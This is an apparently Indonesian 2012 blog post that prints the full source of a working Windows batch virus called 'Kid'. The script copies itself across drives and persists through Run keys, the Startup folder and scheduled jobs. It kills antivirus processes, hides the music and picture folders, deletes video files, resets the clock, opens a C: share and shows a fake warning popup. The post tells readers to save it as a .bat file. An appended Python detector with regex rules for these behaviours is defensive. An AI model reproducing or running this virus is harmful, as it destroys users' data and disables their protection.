Wednesday, 07 November 2012

Batch Virus Example (Kid)

The following is an example of a simple virus script from the internet that I modified and added some script to.

Its functions are:
  • Creates a duplicate of itself in the root directory of the hard disk
  • Makes itself run when the computer starts
  • Kills several antivirus applications
  • Deletes video files of certain formats in the My Videos folder when the virus is executed or autoruns
  • Hides the My Music & My Pictures folders
  • Changes the system clock
  • Is not continuously active, only at autorun
The script
=========================================================================
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls

echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001
Copy %0 %SystemRoot%\system32\1001\kid.bat
echo msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
at 12:34 /interactive “%SystemRoot%\system32\1001\kid.bat”
at 12:35 /interactive “%SystemRoot%\system32\1001\kid.bat”
msg * “KOmputer Ini Diserang Oleh GU3 4D1” > nul

taskkill /F /IM ESET.exe
taskkill /F /IM AVG.exe
taskkill /F /IM Kapersky.exe
taskkill /F /IM Norton.exe
taskkill /F /IM PCMAV.exe
taskkill /F /IM CLAMAV.exe
taskkill /F /IM SM?RTP.exe

copy %0 C:\system_file.bat
copy %0 d:\system_file.bat
copy %0 e:\system_file.bat
copy %0 f:\system_file.bat
copy %0 g:\system_file.bat
copy %0 h:\system_file.bat
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

cd\
cd %systemroot%\system32
copy %0 %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\kid.exe
reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\kid.exe /f

copy %0 %systemroot%\system32\kid.bat
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Showsuperhidden /t reg_dword /d 0 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\policies\explorer /v nofolderoption /t reg_dword /d 1 /f
REG ADD HKCU\software\Microsoft\windows\currentversion\run /v aktifkan /t reg_SZ /d C:\system_file.bat /f

attrib +h +s "%userprofile%\my documents\my music"
attrib +h +s "%userprofile%\my documents\my pictures"

del "%userprofile%\my documents\my videos\*.3gp"
del "%userprofile%\my documents\my videos\*.mkv"
del "%userprofile%\my documents\my videos\*.avi"
del d:\*.3gp
del e:\*.3gp
del f:\*.3gp
del d:\*.avi
del e:\*.avi
del f:\*.avi
del d:\*.mkv
del e:\*.mkv
del f:\*.mkv
=========================================================================

Copy the script above into Notepad, then save the file in .bat format.
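Each behaviour in the list above leaves a recognisable command pattern, so an unknown .bat file can be triaged statically before anyone runs it. The following is an added example, not part of the original post: the rule names, regular expressions, threshold and both embedded samples (a few lines quoted from the script above, and a harmless cleanup script) are assumptions constructed for illustration.

```python
import re

# Rule names, patterns and threshold are assumptions made for this example;
# each pattern mirrors one behaviour from the page's list or script.
RULES = {
    "self_copy": re.compile(r"^\s*copy\s+%0\s", re.I),
    "run_key_persistence": re.compile(r"^\s*reg\s+add\s+\S*\\currentversion\\run\s", re.I),
    "startup_folder_copy": re.compile(r"^\s*copy\s.*\\Start Menu\\Programs\\Startup\\", re.I),
    "scheduled_at_job": re.compile(r"^\s*at\s+\d{1,2}:\d{2}\s", re.I),
    "kills_processes": re.compile(r"^\s*taskkill\s+/F\s+/IM\s", re.I),
    "explorer_policy_tamper": re.compile(r"^\s*reg\s+add\s.*(nofolderoption|showsuperhidden)", re.I),
    "hides_folders": re.compile(r"^\s*attrib\s.*\+h\s+\+s", re.I),
    "wildcard_delete": re.compile(r"^\s*del\s.*\*\.\w+", re.I),
    "clock_change": re.compile(r"\|\s*(time|date)\b", re.I),
    "opens_share": re.compile(r"^\s*net\s+share\s+\S+=", re.I),
}

# Constructed sample: a few lines quoted from the script on this page.
SAMPLE = r"""@echo off
echo 01/01/2000 | date >> nul
copy %0 C:\system_file.bat
taskkill /F /IM AVG.exe
REG ADD HKCU\software\Microsoft\windows\currentversion\run /v aktifkan /t reg_SZ /d C:\system_file.bat /f
attrib +h +s "%userprofile%\my documents\my music"
del d:\*.avi
"""

# Constructed benign sample: an ordinary cleanup script that trips one rule only.
BENIGN = r"""@echo off
del "%TEMP%\*.tmp"
echo Cleanup finished at %time%
"""

def triage(text):
    """Return {behaviour: [1-based line numbers]} for every rule that fires."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().lower().startswith(("rem ", "::")):
            continue  # commented-out commands are never executed
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(n)
    return hits

def is_suspicious(text, threshold=3):
    """Flag a script only when several distinct behaviours co-occur."""
    return len(triage(text)) >= threshold

if __name__ == "__main__":
    for name, lines in triage(SAMPLE).items():
        print(f"{name}: lines {lines}")
    print("sample flagged:", is_suspicious(SAMPLE), "| benign flagged:", is_suspicious(BENIGN))
```

Requiring several distinct behaviours keeps single-rule matches such as a temp-file cleanup from being flagged, while the combination of self-copy, Run-key persistence and process killing stands out.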
